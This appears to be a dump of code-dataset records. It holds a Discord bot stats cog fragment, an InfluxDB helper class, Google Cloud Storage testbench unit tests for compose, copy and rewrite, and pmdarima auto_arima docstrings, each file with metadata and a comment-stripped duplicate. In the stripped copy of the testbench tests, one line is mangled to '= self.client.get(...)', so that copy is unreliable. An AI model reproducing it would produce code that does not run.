**Commands:** `{cogs_loaded}`
**Ping:** `{ping}`
**Python version:** `{python_version}`
**discord.py version:** `{discord_py_version}`
**CS-Pound version:** `{bot_version}`
**CPU usage:** `{cpu_percent}`
**Memory usage:** `{memory_percent}`
**CS-Pound memory usage:** `{bot_memory}`
**CS-Pound uptime:** `{bot_uptime}`
**System uptime:** `{system_uptime}`"""
embed = discord.Embed(
colour=0x4BA139, timestamp=datetime.utcnow()
)
embed.set_footer(text="Requested")
embed.set_thumbnail(
url="https://www.chickensmoothie.com/Forum/images/avatars/gallery/Bunnies/0001-1.png"
)
embed.add_field(name="CS-Pound Stats", value=description)
await ctx.send(embed=embed)
else:
pass
def setup(bot):
bot.add_cog(Statistics(bot))
| true | true |
f7232a5787dd822b8c3d68e006678d905ccc32d0 | 703 | py | Python | Configuration/influx.py | marcosmarcon/Oracle-and-Grafana-integration | 0a7f47a940a72b281a9ff04285c222be99516829 | [
"MIT",
"Unlicense"
] | 1 | 2020-10-09T18:02:11.000Z | 2020-10-09T18:02:11.000Z | Configuration/influx.py | marcosmarcon/Oracle-and-Grafana-integration | 0a7f47a940a72b281a9ff04285c222be99516829 | [
"MIT",
"Unlicense"
] | null | null | null | Configuration/influx.py | marcosmarcon/Oracle-and-Grafana-integration | 0a7f47a940a72b281a9ff04285c222be99516829 | [
"MIT",
"Unlicense"
] | null | null | null | from influxdb import InfluxDBClient
class InfluxConnection:
points = []
def __init__(self):
self.points = []
self.host = "host"
self.port = "port"
self.username = "user"
self.password = "pass"
self.database = "base"
self.client = InfluxDBClient(self.host, self.port, self.username, self.password, self.database)
def drop_current_measurement(self, measurement):
self.client.query("DROP MEASUREMENT """ + measurement + """""")
def append_point(self, point):
self.points.append(point)
def write_points(self):
self.client.write_points(self.points)
def clean_points(self):
self.points = [] | 27.038462 | 103 | 0.625889 | from influxdb import InfluxDBClient
class InfluxConnection:
points = []
def __init__(self):
self.points = []
self.host = "host"
self.port = "port"
self.username = "user"
self.password = "pass"
self.database = "base"
self.client = InfluxDBClient(self.host, self.port, self.username, self.password, self.database)
def drop_current_measurement(self, measurement):
self.client.query("DROP MEASUREMENT """ + measurement + """""")
def append_point(self, point):
self.points.append(point)
def write_points(self):
self.client.write_points(self.points)
def clean_points(self):
self.points = [] | true | true |
f7232b19d0c443e84587644f5b373ca332373ac3 | 10,409 | py | Python | tests/test_testbench_object_special.py | noahdietz/storage-testbench | b122e47b69cabcdf981969068df0e9d805f129a3 | [
"Apache-2.0"
] | 4 | 2021-08-20T12:27:11.000Z | 2022-01-24T12:20:19.000Z | tests/test_testbench_object_special.py | noahdietz/storage-testbench | b122e47b69cabcdf981969068df0e9d805f129a3 | [
"Apache-2.0"
] | 260 | 2021-06-29T00:50:44.000Z | 2022-03-30T12:25:26.000Z | tests/test_testbench_object_special.py | noahdietz/storage-testbench | b122e47b69cabcdf981969068df0e9d805f129a3 | [
"Apache-2.0"
] | 11 | 2021-06-14T16:25:31.000Z | 2022-03-22T19:42:49.000Z | #!/usr/bin/env python3
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit test for special object operations in the testbench."""
import json
import os
import unittest
from testbench import rest_server
class TestTestbenchObjectSpecial(unittest.TestCase):
def setUp(self):
rest_server.db.clear()
self.client = rest_server.server.test_client()
# Avoid magic buckets in the test
os.environ.pop("GOOGLE_CLOUD_CPP_STORAGE_TEST_BUCKET_NAME", None)
def test_object_compose(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payloads = {
"fox": "The quick brown fox jumps over the lazy dog\n",
"zebra": "How vexingly quick daft zebras jump!\n",
}
sources = []
for object_name, payload in payloads.items():
# Use the XML API to insert an object, as the JSON API is not yet ready.
response = self.client.put(
"/bucket-name/" + object_name,
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
# Get the metadata so we can include the metageneration in the compose request.
response = self.client.get("/storage/v1/b/bucket-name/o/" + object_name)
self.assertEqual(response.status_code, 200)
o = json.loads(response.data)
sources.append(
{
"name": object_name,
"generation": o.get("generation"),
"objectPreconditions": {"ifGenerationMatch": o.get("generation")},
}
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"sourceObjects": sources}),
)
self.assertEqual(response.status_code, 200, msg=response.data)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
compose_rest = json.loads(response.data)
compose_rest.pop("acl")
compose_rest.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/both")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, compose_rest)
response = self.client.get("/bucket-name/both")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data.decode("utf-8"), payloads["fox"] + payloads["zebra"]
)
def test_object_compose_invalid_requests(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"invalid-sourceObjects": []}),
)
self.assertEqual(response.status_code, 400)
sources = []
for i in range(0, 64):
sources.extend({"name": "test-only-invalid-object"})
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"sourceObjects": sources}),
)
self.assertEqual(response.status_code, 400)
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"sourceObjects": [{"invalid-name": "unused"}]}),
)
self.assertEqual(response.status_code, 400)
def test_object_copy(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payload = "The quick brown fox jumps over the lazy dog"
response = self.client.put(
"/bucket-name/fox",
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/copyTo/b/bucket-name/o/fox2"
)
self.assertEqual(response.status_code, 200, msg=response.data)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
copy_rest = json.loads(response.data)
copy_rest.pop("acl")
copy_rest.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, copy_rest)
response = self.client.get("/bucket-name/fox")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data.decode("utf-8"), "The quick brown fox jumps over the lazy dog"
)
def test_object_copy_with_metadata(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payload = "The quick brown fox jumps over the lazy dog"
response = self.client.put(
"/bucket-name/fox",
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
metadata = {"key0": "label0"}
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/copyTo/b/bucket-name/o/fox2",
data=json.dumps({"metadata": metadata}),
)
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
copy_rest = json.loads(response.data)
copy_rest.pop("acl")
copy_rest.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, copy_rest)
self.assertEqual(get_rest["metadata"], {**get_rest["metadata"], **metadata})
response = self.client.get("/bucket-name/fox2")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data.decode("utf-8"), "The quick brown fox jumps over the lazy dog"
)
def test_object_rewrite(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
# We need a large enough payload to make sure the first rewrite does
# not complete. The minimum is 1 MiB
payload = "The quick brown fox jumps over the lazy dog\n" * 1024 * 1024
response = self.client.put(
"/bucket-name/fox",
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
metadata = {"key0": "label0"}
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/rewriteTo/b/bucket-name/o/fox2",
data=json.dumps({"metadata": metadata}),
)
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
rewrite_rest = json.loads(response.data)
expected_fields = {
"kind",
"totalBytesRewritten",
"objectSize",
"done",
"rewriteToken",
}
actual_fields = set(rewrite_rest.keys())
self.assertEqual(actual_fields, actual_fields | expected_fields)
self.assertEqual(rewrite_rest.get("done"), False)
token = rewrite_rest.get("rewriteToken")
while not rewrite_rest.get("done"):
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/rewriteTo/b/bucket-name/o/fox2",
query_string={"maxBytesRewrittenPerCall": 10, "rewriteToken": token},
data=json.dumps({"metadata": metadata}),
)
self.assertEqual(response.status_code, 200, msg=response.data)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
rewrite_rest = json.loads(response.data)
# Once done, a rewrite returns the new object metadata
self.assertIn("resource", rewrite_rest)
resource = rewrite_rest.get("resource")
# TODO(#27) - I do not understand why the rewrite always returns the full projection
resource.pop("acl")
resource.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, resource)
self.assertEqual(get_rest["metadata"], {**get_rest["metadata"], **metadata})
response = self.client.get("/bucket-name/fox2")
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data.decode("utf-8")), len(payload))
if __name__ == "__main__":
unittest.main()
| 37.713768 | 92 | 0.607647 |
import json
import os
import unittest
from testbench import rest_server
class TestTestbenchObjectSpecial(unittest.TestCase):
def setUp(self):
rest_server.db.clear()
self.client = rest_server.server.test_client()
os.environ.pop("GOOGLE_CLOUD_CPP_STORAGE_TEST_BUCKET_NAME", None)
def test_object_compose(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payloads = {
"fox": "The quick brown fox jumps over the lazy dog\n",
"zebra": "How vexingly quick daft zebras jump!\n",
}
sources = []
for object_name, payload in payloads.items():
response = self.client.put(
"/bucket-name/" + object_name,
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
response = self.client.get("/storage/v1/b/bucket-name/o/" + object_name)
self.assertEqual(response.status_code, 200)
o = json.loads(response.data)
sources.append(
{
"name": object_name,
"generation": o.get("generation"),
"objectPreconditions": {"ifGenerationMatch": o.get("generation")},
}
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"sourceObjects": sources}),
)
self.assertEqual(response.status_code, 200, msg=response.data)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
compose_rest = json.loads(response.data)
compose_rest.pop("acl")
compose_rest.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/both")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, compose_rest)
response = self.client.get("/bucket-name/both")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data.decode("utf-8"), payloads["fox"] + payloads["zebra"]
)
def test_object_compose_invalid_requests(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"invalid-sourceObjects": []}),
)
self.assertEqual(response.status_code, 400)
sources = []
for i in range(0, 64):
sources.extend({"name": "test-only-invalid-object"})
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"sourceObjects": sources}),
)
self.assertEqual(response.status_code, 400)
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"sourceObjects": [{"invalid-name": "unused"}]}),
)
self.assertEqual(response.status_code, 400)
def test_object_copy(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payload = "The quick brown fox jumps over the lazy dog"
response = self.client.put(
"/bucket-name/fox",
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/copyTo/b/bucket-name/o/fox2"
)
self.assertEqual(response.status_code, 200, msg=response.data)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
copy_rest = json.loads(response.data)
copy_rest.pop("acl")
copy_rest.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, copy_rest)
response = self.client.get("/bucket-name/fox")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data.decode("utf-8"), "The quick brown fox jumps over the lazy dog"
)
def test_object_copy_with_metadata(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payload = "The quick brown fox jumps over the lazy dog"
response = self.client.put(
"/bucket-name/fox",
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
metadata = {"key0": "label0"}
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/copyTo/b/bucket-name/o/fox2",
data=json.dumps({"metadata": metadata}),
)
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
copy_rest = json.loads(response.data)
copy_rest.pop("acl")
copy_rest.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, copy_rest)
self.assertEqual(get_rest["metadata"], {**get_rest["metadata"], **metadata})
response = self.client.get("/bucket-name/fox2")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data.decode("utf-8"), "The quick brown fox jumps over the lazy dog"
)
def test_object_rewrite(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payload = "The quick brown fox jumps over the lazy dog\n" * 1024 * 1024
response = self.client.put(
"/bucket-name/fox",
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
metadata = {"key0": "label0"}
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/rewriteTo/b/bucket-name/o/fox2",
data=json.dumps({"metadata": metadata}),
)
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
rewrite_rest = json.loads(response.data)
expected_fields = {
"kind",
"totalBytesRewritten",
"objectSize",
"done",
"rewriteToken",
}
actual_fields = set(rewrite_rest.keys())
self.assertEqual(actual_fields, actual_fields | expected_fields)
self.assertEqual(rewrite_rest.get("done"), False)
token = rewrite_rest.get("rewriteToken")
while not rewrite_rest.get("done"):
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/rewriteTo/b/bucket-name/o/fox2",
query_string={"maxBytesRewrittenPerCall": 10, "rewriteToken": token},
data=json.dumps({"metadata": metadata}),
)
self.assertEqual(response.status_code, 200, msg=response.data)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
rewrite_rest = json.loads(response.data)
self.assertIn("resource", rewrite_rest)
resource = rewrite_rest.get("resource")
= self.client.get("/storage/v1/b/bucket-name/o/fox2")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, resource)
self.assertEqual(get_rest["metadata"], {**get_rest["metadata"], **metadata})
response = self.client.get("/bucket-name/fox2")
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data.decode("utf-8")), len(payload))
if __name__ == "__main__":
unittest.main()
| true | true |
f7232b4e748440a700c512c24ddd5528c3763424 | 14,263 | py | Python | pmdarima/arima/_doc.py | chivalry/pmdarima | 83aaa8249fc93b8bc2311431af53d2d10d312eea | [
"MIT"
] | null | null | null | pmdarima/arima/_doc.py | chivalry/pmdarima | 83aaa8249fc93b8bc2311431af53d2d10d312eea | [
"MIT"
] | null | null | null | pmdarima/arima/_doc.py | chivalry/pmdarima | 83aaa8249fc93b8bc2311431af53d2d10d312eea | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# This is used (with minor differences) in both the class and the function
_AUTO_ARIMA_DOCSTR = \
"""Automatically discover the optimal order for an ARIMA model.
The auto-ARIMA process seeks to identify the most optimal
parameters for an ``ARIMA`` model, settling on a single fitted ARIMA model.
This process is based on the commonly-used R function,
``forecast::auto.arima`` [3].
Auto-ARIMA works by conducting differencing tests (i.e.,
Kwiatkowski–Phillips–Schmidt–Shin, Augmented Dickey-Fuller or
Phillips–Perron) to determine the order of differencing, ``d``, and then
fitting models within ranges of defined ``start_p``, ``max_p``,
``start_q``, ``max_q`` ranges. If the ``seasonal`` optional is enabled,
auto-ARIMA also seeks to identify the optimal ``P`` and ``Q`` hyper-
parameters after conducting the Canova-Hansen to determine the optimal
order of seasonal differencing, ``D``.
In order to find the best model, auto-ARIMA optimizes for a given
``information_criterion``, one of ('aic', 'aicc', 'bic', 'hqic', 'oob')
(Akaike Information Criterion, Corrected Akaike Information Criterion,
Bayesian Information Criterion, Hannan-Quinn Information Criterion, or
"out of bag"--for validation scoring--respectively) and returns the ARIMA
which minimizes the value.
Note that due to stationarity issues, auto-ARIMA might not find a
suitable model that will converge. If this is the case, a ``ValueError``
will be thrown suggesting stationarity-inducing measures be taken prior
to re-fitting or that a new range of ``order`` values be selected. Non-
stepwise (i.e., essentially a grid search) selection can be slow,
especially for seasonal data. Stepwise algorithm is outlined in Hyndman and
Khandakar (2008).
Parameters
----------{y}{exogenous}
start_p : int, optional (default=2)
The starting value of ``p``, the order (or number of time lags)
of the auto-regressive ("AR") model. Must be a positive integer.
d : int, optional (default=None)
The order of first-differencing. If None (by default), the value
will automatically be selected based on the results of the ``test``
(i.e., either the Kwiatkowski–Phillips–Schmidt–Shin, Augmented
Dickey-Fuller or the Phillips–Perron test will be conducted to find
the most probable value). Must be a positive integer or None. Note
that if ``d`` is None, the runtime could be significantly longer.
start_q : int, optional (default=2)
The starting value of ``q``, the order of the moving-average
("MA") model. Must be a positive integer.
max_p : int, optional (default=5)
The maximum value of ``p``, inclusive. Must be a positive integer
greater than or equal to ``start_p``.
max_d : int, optional (default=2)
The maximum value of ``d``, or the maximum number of non-seasonal
differences. Must be a positive integer greater than or equal to ``d``.
max_q : int, optional (default=5)
The maximum value of ``q``, inclusive. Must be a positive integer
greater than ``start_q``.
start_P : int, optional (default=1)
The starting value of ``P``, the order of the auto-regressive portion
of the seasonal model.
D : int, optional (default=None)
The order of the seasonal differencing. If None (by default, the value
will automatically be selected based on the results of the
``seasonal_test``. Must be a positive integer or None.
start_Q : int, optional (default=1)
The starting value of ``Q``, the order of the moving-average portion
of the seasonal model.
max_P : int, optional (default=2)
The maximum value of ``P``, inclusive. Must be a positive integer
greater than ``start_P``.
max_D : int, optional (default=1)
The maximum value of ``D``. Must be a positive integer greater
than ``D``.
max_Q : int, optional (default=2)
The maximum value of ``Q``, inclusive. Must be a positive integer
greater than ``start_Q``.
max_order : int, optional (default=10)
If the sum of ``p`` and ``q`` is >= ``max_order``, a model will
*not* be fit with those parameters, but will progress to the next
combination. Default is 5. If ``max_order`` is None, it means there
are no constraints on maximum order.
m : int, optional (default=1)
The period for seasonal differencing, ``m`` refers to the number of
periods in each season. For example, ``m`` is 4 for quarterly data, 12
for monthly data, or 1 for annual (non-seasonal) data. Default is 1.
Note that if ``m`` == 1 (i.e., is non-seasonal), ``seasonal`` will be
set to False. For more information on setting this parameter, see
:ref:`period`.
seasonal : bool, optional (default=True)
Whether to fit a seasonal ARIMA. Default is True. Note that if
``seasonal`` is True and ``m`` == 1, ``seasonal`` will be set to False.
stationary : bool, optional (default=False)
Whether the time-series is stationary and ``d`` should be set to zero.
information_criterion : str, optional (default='aic')
The information criterion used to select the best ARIMA model. One of
``pmdarima.arima.auto_arima.VALID_CRITERIA``, ('aic', 'bic', 'hqic',
'oob').
alpha : float, optional (default=0.05)
Level of the test for testing significance.
test : str, optional (default='kpss')
Type of unit root test to use in order to detect stationarity if
``stationary`` is False and ``d`` is None. Default is 'kpss'
(Kwiatkowski–Phillips–Schmidt–Shin).
seasonal_test : str, optional (default='ocsb')
This determines which seasonal unit root test is used if ``seasonal``
is True and ``D`` is None. Default is 'OCSB'.
stepwise : bool, optional (default=True)
Whether to use the stepwise algorithm outlined in Hyndman and Khandakar
(2008) to identify the optimal model parameters. The stepwise algorithm
can be significantly faster than fitting all (or a ``random`` subset
of) hyper-parameter combinations and is less likely to over-fit
the model.
n_jobs : int, optional (default=1)
The number of models to fit in parallel in the case of a grid search
(``stepwise=False``). Default is 1, but -1 can be used to designate
"as many as possible".
start_params : array-like, optional (default=None)
Starting parameters for ``ARMA(p,q)``. If None, the default is given
by ``ARMA._fit_start_params``.
transparams : bool, optional (default=True)
Whether or not to transform the parameters to ensure stationarity.
Uses the transformation suggested in Jones (1980). If False,
no checking for stationarity or invertibility is done.
method : str, one of ('css-mle','mle','css'), optional (default=None)
This is the loglikelihood to maximize. If "css-mle", the
conditional sum of squares likelihood is maximized and its values
are used as starting values for the computation of the exact
likelihood via the Kalman filter. If "mle", the exact likelihood
is maximized via the Kalman Filter. If "css" the conditional sum
of squares likelihood is maximized. All three methods use
`start_params` as starting parameters. See above for more
information. If fitting a seasonal ARIMA, the default is 'lbfgs'
trend : str or None, optional (default=None)
The trend parameter. If ``with_intercept`` is True, ``trend`` will be
used. If ``with_intercept`` is False, the trend will be set to a no-
intercept value.
solver : str or None, optional (default='lbfgs')
Solver to be used. The default is 'lbfgs' (limited memory
Broyden-Fletcher-Goldfarb-Shanno). Other choices are 'bfgs',
'newton' (Newton-Raphson), 'nm' (Nelder-Mead), 'cg' -
(conjugate gradient), 'ncg' (non-conjugate gradient), and
'powell'. By default, the limited memory BFGS uses m=12 to
approximate the Hessian, projected gradient tolerance of 1e-8 and
factr = 1e2. You can change these by using kwargs.
maxiter : int, optional (default=None)
The maximum number of function evaluations. Statsmodels defaults this
value to 50 for SARIMAX models and 500 for ARIMA and ARMA models. If
passed as None, will use the seasonal order to determine which to use
(50 for seasonal, 500 otherwise).
disp : int, optional (default=0)
If True, convergence information is printed. For the default
'lbfgs' ``solver``, disp controls the frequency of the output during
the iterations. disp < 0 means no output in this case.
callback : callable, optional (default=None)
Called after each iteration as callback(xk) where xk is the current
parameter vector. This is only used in non-seasonal ARIMA models.
offset_test_args : dict, optional (default=None)
The args to pass to the constructor of the offset (``d``) test. See
``pmdarima.arima.stationarity`` for more details.
seasonal_test_args : dict, optional (default=None)
The args to pass to the constructor of the seasonal offset (``D``)
test. See ``pmdarima.arima.seasonality`` for more details.
suppress_warnings : bool, optional (default=False)
Many warnings might be thrown inside of statsmodels. If
``suppress_warnings`` is True, all of the warnings coming from
``ARIMA`` will be squelched.
error_action : str, optional (default='warn')
If unable to fit an ``ARIMA`` due to stationarity issues, whether to
warn ('warn'), raise the ``ValueError`` ('raise') or ignore ('ignore').
Note that the default behavior is to warn, and fits that fail will be
returned as None. This is the recommended behavior, as statsmodels
ARIMA and SARIMAX models hit bugs periodically that can cause
an otherwise healthy parameter combination to fail for reasons not
related to pmdarima.
trace : bool, optional (default=False)
Whether to print status on the fits. Note that this can be
very verbose...
random : bool, optional (default=False)
Similar to grid searches, ``auto_arima`` provides the capability to
perform a "random search" over a hyper-parameter space. If ``random``
is True, rather than perform an exhaustive search or ``stepwise``
search, only ``n_fits`` ARIMA models will be fit (``stepwise`` must be
False for this option to do anything).
random_state : int, long or numpy ``RandomState``, optional (default=None)
The PRNG for when ``random=True``. Ensures replicable testing and
results.
n_fits : int, optional (default=10)
If ``random`` is True and a "random search" is going to be performed,
``n_iter`` is the number of ARIMA models to be fit.
{return_valid_fits}
out_of_sample_size : int, optional (default=0)
The ``ARIMA`` class can fit only a portion of the data if specified,
in order to retain an "out of bag" sample score. This is the
number of examples from the tail of the time series to hold out
and use as validation examples. The model will not be fit on these
samples, but the observations will be added into the model's ``endog``
and ``exog`` arrays so that future forecast values originate from the
end of the endogenous vector.
For instance::
y = [0, 1, 2, 3, 4, 5, 6]
out_of_sample_size = 2
> Fit on: [0, 1, 2, 3, 4]
> Score on: [5, 6]
> Append [5, 6] to end of self.arima_res_.data.endog values
scoring : str, optional (default='mse')
If performing validation (i.e., if ``out_of_sample_size`` > 0), the
metric to use for scoring the out-of-sample data. One of ('mse', 'mae')
scoring_args : dict, optional (default=None)
A dictionary of key-word arguments to be passed to the ``scoring``
metric.
with_intercept : bool, optional (default=True)
Whether to include an intercept term. Default is True.
sarimax_kwargs : dict or None, optional (default=None)
Keyword arguments to pass to the SARIMAX constructor, if seasonal.
{fit_args}
See Also
--------
:func:`pmdarima.arima.ARIMA`
Notes
-----
* Fitting with `stepwise=False` can prove slower, especially when
`seasonal=True`.
References
----------
.. [1] https://wikipedia.org/wiki/Autoregressive_integrated_moving_average
.. [2] R's auto-arima source code: http://bit.ly/2gOh5z2
.. [3] R's auto-arima documentation: http://bit.ly/2wbBvUN
"""
_Y_DOCSTR = """
y : array-like or iterable, shape=(n_samples,)
The time-series to which to fit the ``ARIMA`` estimator. This may
either be a Pandas ``Series`` object (statsmodels can internally
use the dates in the index), or a numpy array. This should be a
one-dimensional array of floats, and should not contain any
``np.nan`` or ``np.inf`` values.
"""
_EXOG_DOCSTR = """
exogenous : array-like, shape=[n_obs, n_vars], optional (default=None)
An optional 2-d array of exogenous variables. If provided, these
variables are used as additional features in the regression
operation. This should not include a constant or trend. Note that
if an ``ARIMA`` is fit on exogenous features, it must be provided
exogenous features for making predictions.
"""
_FIT_ARGS_DOCSTR = """
**fit_args : dict, optional (default=None)
A dictionary of keyword arguments to pass to the :func:`ARIMA.fit`
method.
"""
_VALID_FITS_DOCSTR = """
return_valid_fits : bool, optional (default=False)
If True, will return all valid ARIMA fits in a list. If False (by
default), will only return the best fit.
"""
| 46.459283 | 79 | 0.665077 |
_AUTO_ARIMA_DOCSTR = \
"""Automatically discover the optimal order for an ARIMA model.
The auto-ARIMA process seeks to identify the most optimal
parameters for an ``ARIMA`` model, settling on a single fitted ARIMA model.
This process is based on the commonly-used R function,
``forecast::auto.arima`` [3].
Auto-ARIMA works by conducting differencing tests (i.e.,
Kwiatkowski–Phillips–Schmidt–Shin, Augmented Dickey-Fuller or
Phillips–Perron) to determine the order of differencing, ``d``, and then
fitting models within ranges of defined ``start_p``, ``max_p``,
``start_q``, ``max_q`` ranges. If the ``seasonal`` optional is enabled,
auto-ARIMA also seeks to identify the optimal ``P`` and ``Q`` hyper-
parameters after conducting the Canova-Hansen to determine the optimal
order of seasonal differencing, ``D``.
In order to find the best model, auto-ARIMA optimizes for a given
``information_criterion``, one of ('aic', 'aicc', 'bic', 'hqic', 'oob')
(Akaike Information Criterion, Corrected Akaike Information Criterion,
Bayesian Information Criterion, Hannan-Quinn Information Criterion, or
"out of bag"--for validation scoring--respectively) and returns the ARIMA
which minimizes the value.
Note that due to stationarity issues, auto-ARIMA might not find a
suitable model that will converge. If this is the case, a ``ValueError``
will be thrown suggesting stationarity-inducing measures be taken prior
to re-fitting or that a new range of ``order`` values be selected. Non-
stepwise (i.e., essentially a grid search) selection can be slow,
especially for seasonal data. Stepwise algorithm is outlined in Hyndman and
Khandakar (2008).
Parameters
----------{y}{exogenous}
start_p : int, optional (default=2)
The starting value of ``p``, the order (or number of time lags)
of the auto-regressive ("AR") model. Must be a positive integer.
d : int, optional (default=None)
The order of first-differencing. If None (by default), the value
will automatically be selected based on the results of the ``test``
(i.e., either the Kwiatkowski–Phillips–Schmidt–Shin, Augmented
Dickey-Fuller or the Phillips–Perron test will be conducted to find
the most probable value). Must be a positive integer or None. Note
that if ``d`` is None, the runtime could be significantly longer.
start_q : int, optional (default=2)
The starting value of ``q``, the order of the moving-average
("MA") model. Must be a positive integer.
max_p : int, optional (default=5)
The maximum value of ``p``, inclusive. Must be a positive integer
greater than or equal to ``start_p``.
max_d : int, optional (default=2)
The maximum value of ``d``, or the maximum number of non-seasonal
differences. Must be a positive integer greater than or equal to ``d``.
max_q : int, optional (default=5)
The maximum value of ``q``, inclusive. Must be a positive integer
greater than ``start_q``.
start_P : int, optional (default=1)
The starting value of ``P``, the order of the auto-regressive portion
of the seasonal model.
D : int, optional (default=None)
The order of the seasonal differencing. If None (by default, the value
will automatically be selected based on the results of the
``seasonal_test``. Must be a positive integer or None.
start_Q : int, optional (default=1)
The starting value of ``Q``, the order of the moving-average portion
of the seasonal model.
max_P : int, optional (default=2)
The maximum value of ``P``, inclusive. Must be a positive integer
greater than ``start_P``.
max_D : int, optional (default=1)
The maximum value of ``D``. Must be a positive integer greater
than ``D``.
max_Q : int, optional (default=2)
The maximum value of ``Q``, inclusive. Must be a positive integer
greater than ``start_Q``.
max_order : int, optional (default=10)
If the sum of ``p`` and ``q`` is >= ``max_order``, a model will
*not* be fit with those parameters, but will progress to the next
combination. Default is 5. If ``max_order`` is None, it means there
